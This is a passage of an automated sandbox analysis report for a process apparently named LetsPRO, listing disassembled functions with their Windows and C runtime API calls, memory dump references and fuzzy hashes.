                                        • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,000000FF), ref: 6C937DD7
                                        • GetLastError.KERNEL32 ref: 6C937DE4
                                        • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,000000FF), ref: 6C937DF6
                                          • Part of subcall function 6C937483: CreateTimerQueue.KERNEL32(00000001,?,?,00000000,?,00000000,F3B6147F,00000000,?,?), ref: 6C9374AB
                                          • Part of subcall function 6C937483: std::exception::exception.LIBCMT(?,00000001,00000001,?,?,00000000), ref: 6C937504
                                          • Part of subcall function 6C937483: _CxxThrowException.MSVCR100(F3B6147F,6C90C8D8,?,00000001,00000001,?,?,00000000), ref: 6C937519
                                        • DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 6C937DFC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Timer$Concurrency@@QueueQueue@details@Shared$CreateDeleteErrorExceptionLastThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 3155262267-0
                                        • Opcode ID: 97b6b94e8919215358924696469b795c63d083b065dfa634f3145e283aacc3f1
                                        • Instruction ID: 85d88c85dd8f1408607005d6356333509d2c05ae14e3e5abf7569b42b831cfba
                                        • Opcode Fuzzy Hash: 97b6b94e8919215358924696469b795c63d083b065dfa634f3145e283aacc3f1
                                        • Instruction Fuzzy Hash: 87218330604624DFD7218E25CA84A1773EAEF81335B159669E87D8BAE0DB30EC00CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C94CA4F Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                        • _mbspbrk.MSVCR100(?,6C94CB08,?,00000000,6C94BF68,?,?,?,?,?,?,6C927472), ref: 6C94CA73
                                        • _match.LIBCMT ref: 6C94CA80
                                        • _calloc_crt.MSVCR100(00000004,00000002,?,00000000,6C94BF68,?,?,?,?,?,?,6C927472), ref: 6C94CAB4
                                        • free.MSVCR100(?,?,00000000,6C94BF68,?,?,?,?,?,?,6C927472), ref: 6C94CAF0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _calloc_crt_match_mbspbrkfree
                                        • String ID:
                                        • API String ID: 518297505-0
                                        • Opcode ID: 5d027c600299b3be60d0e890980928d8cb375b7bd791fdb8cf0050e5c63d0b08
                                        • Instruction ID: f8a4c22181110df2bd25d4c4225e12971cc03967f1f13f269fc0a68db5e1945f
                                        • Opcode Fuzzy Hash: 5d027c600299b3be60d0e890980928d8cb375b7bd791fdb8cf0050e5c63d0b08
                                        • Instruction Fuzzy Hash: 1C11D6727489508FCB06EF9EA840409B3F9EF9A768339861BD555D7E40EA31D849CF44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C94BEC8 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,6C9A7C68,00000104,?,?,?,?,?,?,6C927472), ref: 6C94BEE6
                                        • _parse_cmdline.LIBCMT ref: 6C94BF11
                                        • _malloc_crt.MSVCR100(?,?,?,?,?,?,?,6C927472), ref: 6C94BF34
                                        • _parse_cmdline.LIBCMT ref: 6C94BF4D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _parse_cmdline$FileModuleName_malloc_crt
                                        • String ID:
                                        • API String ID: 3364912563-0
                                        • Opcode ID: 156b37011e655a75524c541e60ef9aba6c6e4a6785aee37542e71ac030919c1a
                                        • Instruction ID: 077aefb39a42b8cfb707bf83ad873e60781db9fd6a5dfcda539bb75d787df4b0
                                        • Opcode Fuzzy Hash: 156b37011e655a75524c541e60ef9aba6c6e4a6785aee37542e71ac030919c1a
                                        • Instruction Fuzzy Hash: 48112672704614ABDB10CAB49841AEE37B8DF46B74F200AAAE511D76C0DB70EA058FA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9485ED Relevance: 6.1, APIs: 4, Instructions: 68threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 6C9485FA
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C948627
                                        • _CxxThrowException.MSVCR100(6C933918,6C9A0D0C,?,?), ref: 6C948635
                                        • std::exception::exception.LIBCMT(?,?), ref: 6C948692
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency::unsupported_os::unsupported_osCurrentExceptionThreadThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 1840351702-0
                                        • Opcode ID: 317a9947613c64fe8ba2c25aff6aad3bd898b550ffdbb5cbe5288c0755407c11
                                        • Instruction ID: a1579885a0260bab07b5f6d7a31ea055814d5441a859a7834994e35de2807ee3
                                        • Opcode Fuzzy Hash: 317a9947613c64fe8ba2c25aff6aad3bd898b550ffdbb5cbe5288c0755407c11
                                        • Instruction Fuzzy Hash: 1F21F072A05349DFCB58DFA5C48499EBBB8BF6030DB08886BD416D3A00C770E989CBD4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C940B70 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                        Download Yara Rule
                                        APIs
                                        • TlsSetValue.KERNEL32(?,?,?,?,?,6C940AA4,00000001,?,6C940AC4), ref: 6C940B8E
                                        • QueryDepthSList.KERNEL32(00000148,?,?,?,?,6C940AA4,00000001,?,6C940AC4), ref: 6C940BA2
                                        • CloseHandle.KERNEL32(?,?,?,?,?,6C940AA4,00000001,?,6C940AC4), ref: 6C940BC4
                                        • InterlockedPushEntrySList.KERNEL32(00000148,-00000004,?,?,?,?,6C940AA4,00000001,?,6C940AC4), ref: 6C940BDC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: List$CloseDepthEntryHandleInterlockedPushQueryValue
                                        • String ID:
                                        • API String ID: 94243546-0
                                        • Opcode ID: 7894760a2dbad6229d861473611d14c021d9c69c27e4d11765219a1d3da7207d
                                        • Instruction ID: 3c706452cf3f804209872a51c6fd1668675fb50f55193907b70ed2e14791656d
                                        • Opcode Fuzzy Hash: 7894760a2dbad6229d861473611d14c021d9c69c27e4d11765219a1d3da7207d
                                        • Instruction Fuzzy Hash: 0F21A471A01650DBDF20CF20D888B9E77F8EFA1719F105969E85ADB680DB74E908CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90CD01 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        • _lock_file.MSVCR100(?,6C90CDA8,00000014), ref: 6C90CD4E
                                          • Part of subcall function 6C90A4CD: _lock.MSVCR100(?,?,?,6C956EF0,00000040,6C956F28,0000000C,6C9286C6,00000000,?), ref: 6C90A4FA
                                        • _fgetwc_nolock.MSVCR100(?,?,?,6C90CDA8,00000014), ref: 6C90CD63
                                        • _errno.MSVCR100(6C90CDA8,00000014), ref: 6C912A5C
                                        • _invalid_parameter_noinfo.MSVCR100(6C90CDA8,00000014), ref: 6C928700
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_fgetwc_nolock_invalid_parameter_noinfo_lock_lock_file
                                        • String ID:
                                        • API String ID: 3916178533-0
                                        • Opcode ID: 9760872554aff5384f1e983fb576520069deacef0af2a3bae27da0aed9986a42
                                        • Instruction ID: d2ea480933b599e50c8bfc49b65a91439563411cc618de92dbfe17e7055e046b
                                        • Opcode Fuzzy Hash: 9760872554aff5384f1e983fb576520069deacef0af2a3bae27da0aed9986a42
                                        • Instruction Fuzzy Hash: CF11B672A0565ADFCB20AFA8C88149D76F5AF15318B21853ED868D7ED0C738C585CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90E32C Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Name::operator+$NameName::
                                        • String ID:
                                        • API String ID: 168861036-0
                                        • Opcode ID: 1776782ab1ff18849aca45d57362ed1f829dc2b7542b0e2894cc3383a4c1aaa4
                                        • Instruction ID: 5f73b0ca10edcecf0f717a07cfd6c45097c16e847acb5e36afc0c625076ee211
                                        • Opcode Fuzzy Hash: 1776782ab1ff18849aca45d57362ed1f829dc2b7542b0e2894cc3383a4c1aaa4
                                        • Instruction Fuzzy Hash: BE21A175B052889FCB10CB68D490AEDBFF9AF1A604B54446ED0D5A7F40E730E984CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C938FBE Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::exception::exception.LIBCMT(?), ref: 6C938FDF
                                          • Part of subcall function 6C9736DA: std::exception::_Copy_str.LIBCMT(6C942185,?,?,6C942185,6C941FF3,?,6C941FF3,00000001), ref: 6C9736F5
                                        • _CxxThrowException.MSVCR100(?,6C9A0D2C), ref: 6C938FF4
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C939012
                                        • SetEvent.KERNEL32(?), ref: 6C93905D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency::unsupported_os::unsupported_osCopy_strEventExceptionThrowstd::exception::_std::exception::exception
                                        • String ID:
                                        • API String ID: 1689211050-0
                                        • Opcode ID: 30f1cd97e7e93398b44f3329152b9b210b504a035ec14f343ec8024db019c5ca
                                        • Instruction ID: e3f9a83957b52e0194e4a02c5da994a477ed8da84809d5476b2fe6ef7cf67a6a
                                        • Opcode Fuzzy Hash: 30f1cd97e7e93398b44f3329152b9b210b504a035ec14f343ec8024db019c5ca
                                        • Instruction Fuzzy Hash: 24116D32900218EBCB04DF64C885A9E77B8FF55364B119066EC0ADB611DB35EA45CBD0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C942240 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::exception::exception.LIBCMT(?), ref: 6C942273
                                        • _CxxThrowException.MSVCR100(?,6C9A0EC8), ref: 6C942288
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C9422AE
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C9422C7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency::unsupported_os::unsupported_os$ExceptionThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 3087931431-0
                                        • Opcode ID: 8e00abcb4408ed656b4412fdee59399e229fde0813fde43f44b99654fe84faf8
                                        • Instruction ID: 0190e29a691d8ddbe07bf6a00f07222ac6cb0659f03b1bf63d6f9177bf1a2fdd
                                        • Opcode Fuzzy Hash: 8e00abcb4408ed656b4412fdee59399e229fde0813fde43f44b99654fe84faf8
                                        • Instruction Fuzzy Hash: EA11E336609A85ABCB1CDFA9D4C88CD77ADBF65314320C227E420D7F40DB70D5498B50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90E328 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Name::operator+$NameName::
                                        • String ID:
                                        • API String ID: 168861036-0
                                        • Opcode ID: d3c96935cc41e385b594de98a1cd7da35ab34922c5bd12a4c69b8cbb71d33353
                                        • Instruction ID: dfd354d40b3fc85a2d951546aac8075a6d9163790607bc13f64a762b6c021438
                                        • Opcode Fuzzy Hash: d3c96935cc41e385b594de98a1cd7da35ab34922c5bd12a4c69b8cbb71d33353
                                        • Instruction Fuzzy Hash: 34219071B052889FCB10CF64D890AEDBFF9AF1A604F44446EE4D9A7B41E730E984CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C94665F Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C9466A2
                                        • GetLastError.KERNEL32 ref: 6C9466AF
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C9466C7
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C9466D5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventExceptionLastThrow
                                        • String ID:
                                        • API String ID: 1394060424-0
                                        • Opcode ID: ff17718c77c1240b9f8e4710459d3b00a096ca1edca0cc589ff4a49394159b6d
                                        • Instruction ID: bf75c018438439ae958cb455fbd4068f5536d693c1eb18e5e2540cecd0586f85
                                        • Opcode Fuzzy Hash: ff17718c77c1240b9f8e4710459d3b00a096ca1edca0cc589ff4a49394159b6d
                                        • Instruction Fuzzy Hash: C5114CB19007009FC320DF6AD885A57BBF8FFA9654751892EE09AD3A10D735E849CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C910C46 Relevance: 6.1, APIs: 4, Instructions: 56COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT(00000000,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C910C68
                                        • _wcslen.LIBCMT(00000000,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C910C7B
                                        • _wcsnicoll.MSVCR100(00000000,00000000,00000000,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C910C98
                                        • ___mbtow_environ.LIBCMT ref: 6C9308D4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _wcslen$___mbtow_environ_wcsnicoll
                                        • String ID:
                                        • API String ID: 3727037093-0
                                        • Opcode ID: 6983a1c885c22377c190493690385a16415766d2496590a90aedf539ec6a2630
                                        • Instruction ID: 29ff0740626f6652501959fca533c96a128292f2cfd664244f04df7e00b93b96
                                        • Opcode Fuzzy Hash: 6983a1c885c22377c190493690385a16415766d2496590a90aedf539ec6a2630
                                        • Instruction Fuzzy Hash: A501DB32B0D6ACE7CB115A69E906A8937FC9F62758B252026EC54D7E14EB32D440CFD4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9421A3 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::exception::exception.LIBCMT(?), ref: 6C9421E3
                                          • Part of subcall function 6C9736DA: std::exception::_Copy_str.LIBCMT(6C942185,?,?,6C942185,6C941FF3,?,6C941FF3,00000001), ref: 6C9736F5
                                        • _CxxThrowException.MSVCR100(6C933AC0,6C9A0EAC,?), ref: 6C9421F8
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(?,6C933AC0,6C9A0EAC,?), ref: 6C942200
                                        • std::exception::exception.LIBCMT(?), ref: 6C94222D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Policystd::exception::exception$Concurrency@@Copy_strElementExceptionKey@2@@Policy@SchedulerThrowValue@std::exception::_
                                        • String ID:
                                        • API String ID: 2461868040-0
                                        • Opcode ID: 22f84e7174b7931e4ec1d2008ebab55369d9ec87554061d1377b2fd399fedc9e
                                        • Instruction ID: 7b4e1645b227c676fce8eb1d189a09c261c790ab7c84c1b12bac7ee629ae264c
                                        • Opcode Fuzzy Hash: 22f84e7174b7931e4ec1d2008ebab55369d9ec87554061d1377b2fd399fedc9e
                                        • Instruction Fuzzy Hash: 9C11A536A00548ABCF04DF69C8858DE7B7ABFA5254B10C026E915DBB00DB30E60A8B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C911EFC Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        • _fileno.MSVCR100(?,?,00000001,?,?,6C911EBE,?,?,?,6C911EE0,0000000C), ref: 6C911F41
                                        • _lseek.MSVCR100(00000000,?,00000001,?,?,6C911EBE,?,?,?,6C911EE0,0000000C), ref: 6C911F48
                                        • _errno.MSVCR100(?,?,6C911EBE,?,?,?,6C911EE0,0000000C), ref: 6C928D6F
                                        • _ftell_nolock.MSVCR100(?,?,?,6C911EBE,?,?,?,6C911EE0,0000000C), ref: 6C928D83
                                          • Part of subcall function 6C90A5D5: _fileno.MSVCR100(?,?,?,?,?,?,?,6C90A870,?), ref: 6C90A604
                                          • Part of subcall function 6C90A5D5: _write.MSVCR100(00000000,?,?,?,?,?,?,6C90A870,?), ref: 6C90A60B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _fileno$_errno_ftell_nolock_lseek_write
                                        • String ID:
                                        • API String ID: 2052885585-0
                                        • Opcode ID: 523e45f972f326b0856515492de7bbc13bfb962e2f066c4639feadb639055845
                                        • Instruction ID: d182420e8562c353a317b1babe31e68bf48cb9d3588f2dc770a9a02c54128611
                                        • Opcode Fuzzy Hash: 523e45f972f326b0856515492de7bbc13bfb962e2f066c4639feadb639055845
                                        • Instruction Fuzzy Hash: CE01DB3252475DAFCB104E25C8016CA7758EF3337CF14860AE87496ED0DB39D51A8B84
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C940403 Relevance: 6.1, APIs: 4, Instructions: 52COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C94040A
                                          • Part of subcall function 6C93B397: ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100 ref: 6C93B3B9
                                        • ??0SchedulerPolicy@Concurrency@@QAA@IZZ.MSVCR100(?,00000000,6C9A55E0,0000000C,6C9403B2,?,?,?,6C9361DE,?,6C9454B2,00000004,6C945DD3,?,?,00000000), ref: 6C94044D
                                        • memcpy.MSVCR100(?,?,00000024,6C9A55E0,0000000C,6C9403B2,?,?,?,6C9361DE,?,6C9454B2,00000004,6C945DD3,?,?), ref: 6C940468
                                        • ??3@YAXPAX@Z.MSVCR100(?,?,6C9454B2,00000004,6C945DD3,?,?,00000000,?,?,?,6C945CDB,00000001), ref: 6C940492
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency@@Spin$??3@H_prolog3Once@?$_Policy@SchedulerWait@$00@details@memcpy
                                        • String ID:
                                        • API String ID: 3595554022-0
                                        • Opcode ID: 011a6f0a6e27724eb0961b935c71bd093e87fcb77f70569413b5b7d59ebe5c71
                                        • Instruction ID: 84f1e6ac79b28e38be1428fcaedccc72806218138f3f2a0bee7e69611a57d551
                                        • Opcode Fuzzy Hash: 011a6f0a6e27724eb0961b935c71bd093e87fcb77f70569413b5b7d59ebe5c71
                                        • Instruction Fuzzy Hash: F3119E30B06280CBEB08CFE4D840BAD73B5FF65308F209469D514EBA90EB35D905CB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C911D24 Relevance: 6.1, APIs: 4, Instructions: 52COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _strlen.LIBCMT(00000000,?,00007FFF,?,6C911CE8,?,6C911D08,00000010), ref: 6C911D42
                                        • _strlen.LIBCMT(00000000,?,00007FFF,?,6C911CE8,?,6C911D08,00000010), ref: 6C911D51
                                        • __fassign.LIBCMT(00000000,00000000,00000000,?,00007FFF,?,6C911CE8,?,6C911D08,00000010), ref: 6C911D6D
                                        • ___wtomb_environ.LIBCMT ref: 6C93087E
                                        Memory Dump Source
